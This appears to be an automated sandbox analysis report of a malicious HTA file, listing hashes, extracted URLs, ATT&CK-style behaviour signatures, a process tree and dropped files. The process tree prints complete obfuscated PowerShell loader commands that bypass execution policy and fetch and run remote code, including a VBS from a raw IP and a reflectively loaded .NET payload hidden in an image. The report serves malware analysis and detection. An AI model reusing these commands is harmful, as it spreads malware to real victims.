Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
10-12-2024 05:02
Static task
static1
Behavioral task
behavioral1
Sample
matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta
Resource
win10v2004-20241007-en
General
-
Target
matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta
-
Size
193KB
-
MD5
012b83177846ce35f8ae1f6b304ff9c6
-
SHA1
ae49e4e85d2fe80a83d0aa6420c72246e8b5e17e
-
SHA256
264fc1a50a0f37a599e8cb50572d99a78c493da4837930a480253e04a5963fa9
-
SHA512
d48bdf9a62e410254cf3074d7215f922e98d6d1ee0c936fff9c3720a000bdc571758e19a5338b7ad76f70b851aac641a7eaba09b92782d5e57e4921e368d2978
-
SSDEEP
96:4owZw9d6yfaqcQ6PHO/3g9a8GPcQ6PHQ0/3g9a8GBGl/Qcj/WqgO7fpR1MK95tio:4LwzQcHgODpqPvQ
Malware Config
Extracted
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2436 powershell.exe 6 2556 powershell.exe 8 2556 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2436 powershell.exe 2060 cmd.exe -
pid Process 2556 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe -
System Time Discovery 1 TTPs 1 IoCs
Adversary may gather the system time and/or time zone settings from a local or remote system.
pid Process 2672 WScript.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2436 powershell.exe 2556 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2436 powershell.exe Token: SeDebugPrivilege 2556 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2560 wrote to memory of 2060 2560 mshta.exe 31 PID 2560 wrote to memory of 2060 2560 mshta.exe 31 PID 2560 wrote to memory of 2060 2560 mshta.exe 31 PID 2560 wrote to memory of 2060 2560 mshta.exe 31 PID 2060 wrote to memory of 2436 2060 cmd.exe 33 PID 2060 wrote to memory of 2436 2060 cmd.exe 33 PID 2060 wrote to memory of 2436 2060 cmd.exe 33 PID 2060 wrote to memory of 2436 2060 cmd.exe 33 PID 2436 wrote to memory of 2776 2436 powershell.exe 34 PID 2436 wrote to memory of 2776 2436 powershell.exe 34 PID 2436 wrote to memory of 2776 2436 powershell.exe 34 PID 2436 wrote to memory of 2776 2436 powershell.exe 34 PID 2776 wrote to memory of 2916 2776 csc.exe 35 PID 2776 wrote to memory of 2916 2776 csc.exe 35 PID 2776 wrote to memory of 2916 2776 csc.exe 35 PID 2776 wrote to memory of 2916 2776 csc.exe 35 PID 2436 wrote to memory of 2672 2436 powershell.exe 37 PID 2436 wrote to memory of 2672 2436 powershell.exe 37 PID 2436 wrote to memory of 2672 2436 powershell.exe 37 PID 2436 wrote to memory of 2672 2436 powershell.exe 37 PID 2672 wrote to memory of 2556 2672 WScript.exe 38 PID 2672 wrote to memory of 2556 2672 WScript.exe 38 PID 2672 wrote to memory of 2556 2672 WScript.exe 38 PID 2672 wrote to memory of 2556 2672 WScript.exe 38
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"2⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepoWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4psdheun.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE5CE.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE5CD.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2916
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS"4⤵
- System Location Discovery: System Language Discovery
- System Time Discovery
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2556
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD579ce1e43b3e0ad7d061a89f3d1ed1cc1
SHA14bcd17879d50f18e41992f74d4694f8b4dfb6983
SHA256e7d35caaf78f3d8d87265a9f8d0e335e56d38470ef41448cc6c94296f2564242
SHA512d9c6615816261fa3c2309964ab5bb13dadc21b48f8ed8db426802826e8f5f5df8b3e5361bac18b40f1f1a9468ee7387f4606c6e882bf3966dd41e9eaee691e7e
-
Filesize
7KB
MD553a4245c6e261579796f9a5268a4eb5b
SHA1a65a41cec647c419b1a1bfda07196ce36561ad81
SHA2564508dd5c12d7770f71fc8ef442cc0b6bdf05a4aaf98694c5df23d4070fb516c2
SHA5127037a32ba33f037cdaeab9978d139f3904b15fb01f1cf8d1079b7f52c0d99a01165d2fb77ac5178da549a626bcccb261bce2466a102ada96dd1536b3447f9937
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD56dc0bac1fef86d6bb2a07135900bc918
SHA13bfcfd844d7e1ffc2df26dcebfc6fe5925d48cab
SHA25671c9da128a67b9eaa3857ea783bce4635c45c528210a617572ee6e43b33ef8f5
SHA5127af08eaaf128aeb2c98e42f41979bc44c186ae9815e80317e7201b4828f5eb15562ebaf82295fecd0348480d0baeb03e708227bc64f406322a2b07d1f6e401c2
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IRDR4HWT1ZK9L76LWSAB.temp
Filesize7KB
MD59761338a5108942095b2851d405a6a96
SHA1ff1bc69903ac73aa1353da013115be5f25e2bbac
SHA2560a8191d952fa5db21d4f7b3119a38412c9dfd64e85520055f2c240a27b2b834b
SHA5125fc2725ffc62861e4833e135061ec928b2b8369f0d4234910cba3f757ed8bcf6cd4e7d2a4b1900413991becbefd25457e3d708adea85f91e659cf2e644089327
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5c93f1542f7b2b5f743c53b1bc20e3e12
SHA1a556ed95080bd20e17db5117fef7d280a52643a1
SHA2568ffba72c274ef862a7491c0cef5196cd048460f874421a7b1070efcc47bd0817
SHA512e50ff963bc130124ebd80e311163030a160c6982ec07fe404541e3841a53f48cfaeba6692d10817a16525ac570e63ebbb915594b0ef0581c096f53c3fc3a399d
-
Filesize
150KB
MD55ce00a79a9f41d260446bfdcc6267adf
SHA10b2b90beb56c59916b98004b1444698538729822
SHA256efab5d21ed82f610bc5f1734b909a7e5c3a6c2ecebb276dd03b4d5baf8e9b058
SHA512d4de7fe61f23ce7524ed3123319ac93f33ae1806bd426045ca9df1fa9ee82cca58aa314711bbde6a6ffa2eee98dc20cc5e4d80d2ec7abb028be0639944714fee
-
Filesize
482B
MD58c16810a9a149ee7b288951c6afdfcd1
SHA14322374e8321e8a97ab6af0b6a23bb3f016c9713
SHA25695c610a9e86321d9dea63594d0d9c9cb72c5dc56edf8f78f25736a76cac0d949
SHA5120e37863619591fdd2cde0ae8ead71ef856695e299e9bb76266f1b40588d3f7e26521f7cb0bedcfa2a0809224dc02b076d4a07a1d247b23adb30e79ca5f626564
-
Filesize
309B
MD5cf2b7b96bc92e68e1ef92dd26d18919e
SHA1ff2e23d20a802549ae8933c387ae1c56fb6b75c7
SHA2569ca75e965e71364d7254b9021186f524b771f6c928c08d24038ade1e2a571e9d
SHA512a9a74309d779e85cd0ca9dffed5073a8fb1e880ee71307f15c7624d224b1879a7936310250fc3e303a8bfbcc58e51ff9f779c9d348574f4a4f6e3474e60148ff
-
Filesize
652B
MD589f3a012a2953c6768d6f960e75e938d
SHA14088cc0291d47aaef66518bc2a30ddba2ae26705
SHA256aeb92905e2eab4a5ede04fcb4318bd194d89f45ae6c0678e391a0e68bfcb253b
SHA5126738f13b9d68a7fb290af991ca71c33c1ecc2348ef431108d639d399ee4016c2dd84da16dfc68062fa04176bdd7ea4ddfb8db30777abb2d2f88b5899073b9436